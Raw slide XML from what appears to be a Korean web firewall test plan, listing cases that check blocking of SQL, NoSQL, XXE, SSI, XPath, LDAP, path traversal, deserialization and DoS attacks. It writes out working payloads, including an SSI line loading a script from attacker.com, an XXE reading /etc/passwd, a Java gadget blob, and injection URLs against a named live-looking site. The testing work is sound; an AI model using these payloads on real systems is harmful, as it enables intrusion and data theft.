                          <a:ea typeface="굴림" charset="-127"/>
                        </a:rPr>
                        <a:t>PDF,DOCX,HWP 3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Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
                          <a:ea typeface="굴림" charset="-127"/>
                        </a:rPr>
                        <a:t>가지 형태로 생성</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
                        <a:ea typeface="굴림" charset="-127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None/>
                      </a:pP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4)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게시판을 통해 위 개인정보 압축 파일 업로드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5)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게시판을 통해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업로드된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개인정보 다운로드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6)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301686" y="2610722"/>
            <a:ext cx="3977350" cy="273976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CASE1)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정탐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파일생성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문서내에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주민등록번호가 포함된 파일 생성 후 파일 압축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CASE2)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오탐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파일생성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문서내에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주민등록가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아닌 형식에 대해 생성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CASE3)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정탐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파일생성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주민등록번호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3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건이 포함된 파일 생성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CASE4)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주민등록번호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오탐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파일생성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실제 주민등록번호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2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건이 포함된 파일 생성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CASE5)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신용카드번호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파일생성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문서내에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신용카드번호가 포함된 파일 생성 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CASE6)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법인등록번호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파일생성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문서내에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법인등록번호가 포함된 파일 생성 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CASE7)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은행계좌번호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딜리미터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,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자리수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탐지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파일생성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은행계좌 번호가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포한됨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파일 생성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(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딜리미터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“---”)</a:t>
            </a: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381084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669357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2.18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서버 정보 노출 방지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웹 서버 응답 중 취약점 노출 가능한 정보 차단</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" baseline="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사용자가 지정한 중요정보 헤더의 노출이 여부 확인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윈도우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‘Cmd.exe’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실행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2) ‘telnet’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명령을 이용하여 아래와 같이 정상적인 구문 요청 실행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3)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사용자가 지정한 중요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정보헤더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기본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Server, X-Powered-By)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삭제 확인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64535" y="2322219"/>
            <a:ext cx="4105275" cy="180022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입력값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Telnet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웹서버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IP 80</a:t>
            </a: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GET / HTTP/1.1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Host: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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.test.com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HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Date:Tue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, 27 Nov 2007 18:27:05 GMT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Server: Apache/1.3.34(Win32) PHP/4.4.2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X-Powered-By: PHP/4.4.2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Contents-Type: text/html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Transfer-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Enconding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Chunked</a:t>
            </a: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79592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807476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2.19  Positive / Negative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방식의 요청 헤더 검증 및 방지</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-K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요청 헤더의 부분 정보를 검사하여 특정 브라우저 또는 자동화 도구를 차단 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" baseline="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Positive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테스트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: Request Header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반드시 포함될 헤더 설정 이후 테스트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일반적으로 브라우저에서 사용되는 기본 헤더를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Positive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형식으로 정의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-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기본 헤더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: User-Agent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툴을 사용하여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User-Agent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헤더 변조 시 탐지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차단 되는지 확인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4)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269875" y="2986088"/>
            <a:ext cx="4105275" cy="23050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CASE1)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정상적인 헤더 포함 </a:t>
            </a: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입력값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telnet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웹서버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IP 80 </a:t>
            </a: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GET / HTTP/1.1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Host: www.test.com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Accept: *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User-Agent: User-Agent: python-requests/2.23.0 </a:t>
            </a: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CASE2)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비정상적으로 헤더 미 포함 테스트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(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탐지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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pP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입력값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telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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웹서버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IP 80 </a:t>
            </a:r>
          </a:p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GET / HTTP/1.1</a:t>
            </a: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Host: www.test.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7268918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188432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2.20 SQL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구문 삽입 공격 방지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DB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에서 직접 사용 가능한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SQL query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삽입 방지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다양한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SQL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구문 삽입에 대해 정확히 탐지하는지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브라우저를 실행하고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주소항목의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임의의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파라미터에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아래와 같이 입력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br>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" u="sng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직사각형 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242282" y="2386431"/>
            <a:ext cx="4105275" cy="11568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endParaRPr lang="en-US" altLang="ko-KR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CASE1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Split&amp;Join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Injection </a:t>
            </a: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삽입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ko-KR" altLang="en-US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입력 값 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: </a:t>
            </a:r>
            <a:b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</a:b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-http://192.168.63.246/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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test.html?pass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=abc%27+union+select+username+from+all_users+where+%27x%27%3D%27x%27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9038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724715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2.21 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>Slow</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>ris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/R.U.D.Y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공격 방지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자동화 도구를 통한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HTTP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baseline="0" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>DoS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공격 시 이를 차단하는지 확인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OWASP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에서 배포한 </a:t>
                      </a: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Slowris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툴을 이용하여 공격 및 탐지 확인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HTTP Dos tool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실행 및 아래와 같이 설정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HTTP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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DoS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공격을 차단 가능 룰 활성화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3) HTTP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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DoS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실행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4)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915" y="2201500"/>
            <a:ext cx="3494088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87378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432663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22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 Hash DOS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공격 방지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자동화 도구를 통한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HTTP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Hash DoS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공격 시 이를 차단하는지 확인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Hash Table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충돌이 발생할 수 있는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POST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문 전송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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B336BB3-5CB8-4EAD-9132-ACEDCFA35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3405" y="2115818"/>
            <a:ext cx="3194685" cy="1850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AC3EAFA7-D6E7-4CB3-8967-03C1D7307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549" y="3975502"/>
            <a:ext cx="3197541" cy="2049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856857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533449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23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부정 로그인 방지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로그인 무차별 대입 공격 차단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무차별 대입 공격을 시도하여 일정 시간 동안 공격 시도 차단 확인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차단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임계치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설정 가능 여부를 확인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차단 대상 선별 기준 필터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조합가능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여부 확인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F8DDB460-F7ED-4639-B848-4289C3F7C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90" y="2448000"/>
            <a:ext cx="4094221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233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568872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2.24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POST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요청 검증 기능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악의적으로 공격이 가능한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POST </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>메소드에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 대해 검증 기능 지원 여부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POST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메소드를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사용하는 페이지에 대해 테스트 진행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방화벽에 사이즈 및 허용 시간 적용 진행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브라우저를 통해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POST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방식의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게시글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작성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3)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검증화면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지원 유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무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1253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087253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2.25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상대 경로 탐지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 비공개 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>디렉토리의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 파일로 부정하게 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>디렉토리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 경로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 우회 후 액세스 공격에 대한 탐지 검증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우회 가능한 패턴을 이용하여 상대 경로에 대한 테스트 진행 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11163" lvl="1" indent="-228600" latinLnBrk="1">
                        <a:buAutoNum type="arabicParenR"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent4"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>http://192.168.63.246/korean//servlet/CookieExample?cookiename==%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini&amp;bankCd2=023&amp;page=5&amp;searchType=contents&amp;searchWord=the%20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확인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11163" lvl="1" indent="-228600" latinLnBrk="1">
                        <a:buAutoNum type="arabicParenR"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11163" lvl="1" indent="-228600" latinLnBrk="1">
                        <a:buAutoNum type="arabicParenR"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent3">
                              <a:lumMod val="75000"/>
                            </a:schemeClr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http://192.168.40.245/%2f..%2f..%2f..%2f..%2fadmin%2flogin.jsp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65579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260950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2.26 Request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Method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 이용한 이상접근 차단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Request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Method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 이용한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공격에 대해 검증 기능 지원 여부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PUT / OPTIONS / HEAD / PROPFIND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등의 메소드를 이용하여 테스트 진행 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PUT / HTTP/1.1 </a:t>
                      </a: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u="sng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41681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821586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2.27 SSI </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>인젝션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 차단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서버의 웹 어플리케이션으로 코드를 삽입하는 공격을 탐지하는지 확인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SSI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인젝션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서버에서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태그 지원 시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게시판에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SSI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인젝션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공격 시도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69875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2)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탐지여부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481267" y="2245980"/>
            <a:ext cx="3795800" cy="5762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&lt;!--#exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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cmd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=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="9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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="9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=""/bin/echo 'IPT SRC=http://attacker.com/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="9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93010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152348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2.28 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>gzip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/deflate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처리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HTTP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요청 헤더 삭제하지 않고 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>gzip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/deflate </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>패킷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 처리 여부 확인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Accept-encoding: </a:t>
                      </a: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gzip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/deflate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헤더 삭제하지 않고 압축된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원 데이터형태로 패킷 내부 검사 가능 여부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26788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516016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2.29 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>NoSql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 Injection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공격 방지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 형식에서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DB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공격이 가능한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NoSQL Injection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 방지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NoSql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인젝션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게시판에 공격 툴을 이용하여 </a:t>
                      </a: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Nosql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인젝션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공격 시도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CCEE7408-C0CB-437D-BB34-7E1D014D2E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374072" y="2286620"/>
            <a:ext cx="3795800" cy="186882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ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>POST /target HTTP/1.1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ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>Host: www.example.com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ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>Content-Length: 29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ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>username[$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>]=&amp;password[$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>]=</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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81503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153375"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="832525"/>
          <a:ext cx="8455345" cy="5636101"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="735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2.30 XXE Injection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공격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방지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 Request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각 파라미터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value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에서 공격 패턴인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&lt;!DOCTYPE, &lt;!ENTITY, SYSTEM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대한 검증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XXE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인젝션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게시판에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공격툴을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이용하여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XXE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인젝션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공격 시도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CCEE7408-C0CB-437D-BB34-7E1D014D2E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374072" y="2269012"/>
            <a:ext cx="3795800" cy="221154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endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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</a:rPr>
              <a:t>POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.1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</a:rPr>
              <a:t>Host: test.com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</a:rPr>
              <a:t>Content-Type: text/xml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</a:rPr>
              <a:t>Content-Length: 145</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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</a:rPr>
              <a:t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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</a:rPr>
              <a:t>&lt;!DOCTYPE foo [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</a:rPr>
              <a:t>&lt;!ELEMENT foo ANY &gt;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</a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SYSTEM "file:///etc/passwd" &gt;]&gt;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</a:rPr>
              <a:t>&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&lt;/foo&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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01548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345629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2.31 Custom Rule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사용자가 직접 패턴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공격이 의심스러운 문자열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 /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검증 방법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/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검사 위치 설정의 조합으로 생성한 룰로 정상 탐지 차단 여부 확인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사용자가 만든 패턴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검증 방법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위치에 맞게 공격 시도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정상 탐지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차단 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25440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142922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2.32 </a:t>
                      </a:r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Insecure Deserialization </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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공격 방지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신뢰할 수 없는 데이터가 이상 동작을 유발시킬 수 있는 역직렬화를 탐지하고 차단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Insecure Deserialization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Burp Suite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사용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(Java Serial </a:t>
                      </a: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Kiler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정상 탐지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차단 여부 확인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FF5A4084-A792-4F79-85A9-079AF637826A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374072" y="2435266"/>
            <a:ext cx="3828473" cy="390087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endParaRPr lang="en-US" altLang="ko-KR" sz="11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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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bbs</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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write_token.php</a:t>
            </a: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 HTTP/1.1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Host: 172.16.100.168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Content-Length: 9180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Accept: application/json, text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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javascript</a:t>
            </a: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, */*; q=0.01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X-Requested-With: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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XMLHttpRequest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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AppleWebKit</a:t>
            </a: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/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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Edg</a:t>
            </a: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/84.0.522.59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Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1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urlencoded</a:t>
            </a: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; charset=UTF-8</a:t>
            </a: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Origin: </a:t>
            </a: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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://172.16.100.168</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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endParaRPr lang="en-US" altLang="ko-KR" sz="11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  <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="굴림" charset="-127"/>
              </a:rPr>
              <a:t>rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc30AAAABABRqYXZhLnV0aWwuQ29tcGFyYXRvcnhyABdqYXZhLmxhbmcucmVmbGVjdC5Qcm94eeEn2iDMEEPLAgABTAABaHQAJUxqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uSGFuZGxlcjt4cHNyABFic2guWFRoaXMkSGFuZGxlcjgWChI6MBQ4AgABTAAGdGhpcyQwdAALTGJzaC9YVGhpczt4cHNyAAlic2guWFRoaXNzLU0a91ZY6gIAAkwACmludGVyZmFjZXN0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMABFpbnZvY2F0aW9uSGFuZGxlcnEAfg</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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1543C8-7365-4E06-B55C-A4CE61FA01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1" y="1823103"/>
            <a:ext cx="4237038" cy="461729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8D4F4D7-951C-4026-81A1-0ED15C4B9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19" y="2444502"/>
            <a:ext cx="4084140" cy="3900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904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245171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2.33 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0" err="1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Xpath</a:t>
                      </a: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 Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-K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공격 방지</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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XML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기반의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DB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를 대상으로 하는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Injection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공격을 탐지하고 차단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Xpath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Injection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정상 탐지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차단 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직사각형 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B238F1-D29F-4640-BDF6-B5646AE3C09F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374072" y="2269013"/>
            <a:ext cx="3795800" cy="76975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28600" indent="-228600" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:buAutoNum type="arabicParenR"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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228600" indent="-228600" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:buAutoNum type="arabicParenR"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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marL="228600" indent="-228600" latinLnBrk="1">
              <a:buFontTx/>
              <a:buAutoNum type="arabicParenR"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://daehwan.co.kr/?act=&amp;vid=&amp;mid=board&amp;category=&amp;search_target=title_content&amp;search_keyword=blah%27+or+1%3D1+or+%27a%27%3D%27a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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228600" indent="-228600" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:buAutoNum type="arabicParenR"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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0AF239B-45A5-422D-A2B1-6D29DA3A5E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50" y="1805940"/>
            <a:ext cx="4237038" cy="463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3456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224644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2.34 LDAP Injection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공격 방지 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LDAP Query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구문을 이용한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Injection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공격을 탐지하고 차단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LDAP Injection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정상 탐지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차단 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6266ABB4-DF60-41FB-AA89-8EFAA6BC3995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374072" y="2269013"/>
            <a:ext cx="3795800" cy="857645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latinLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://daehwan.co.kr/?vid=&amp;mid=board&amp;act=IS&amp;is_keyword=user%3D*%29%28uid%3D*%29%29%28%7C%28uid%3D*+pass%3Dpassword</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              <a:ea typeface="굴림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1C51E4B-E428-4B76-A117-78815ED62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50" y="1813560"/>
            <a:ext cx="4228413" cy="466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654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70933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2.35 URL Encryption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 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URL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의 일부를 암호화하여 여러 공격으로부터 웹서버를 보호하는 기능 검증</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91441" marR="9144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 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웹사이트 설정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- URL Encryption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기능 설정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url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접속 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URL Encryption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이 정상적으로 되는지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D81816E7-BF4D-4AD0-B2C4-617937E262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3" y="2707584"/>
            <a:ext cx="4237038" cy="2503400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 4" descr="스크린샷, 모니터, 화면, 다른이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EAD63EB-3489-4872-AF67-6A232D5E7F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0" y="4631968"/>
            <a:ext cx="4237038" cy="1830716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6" descr="스크린샷, 모니터, 화면, 컴퓨터이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54C218C3-B856-4AF1-995C-0BAC2FCEE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1" y="1816100"/>
            <a:ext cx="4237038" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="화살표: 아래쪽 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED9C4D3-853B-4896-A660-CEBD55635E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="3771900"/>
            <a:ext cx="774700" cy="6568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72139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8502984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3.1 Positive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정책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, Negative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정책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,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사용자 정의정책 지원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Rule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또는 패턴이 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0">
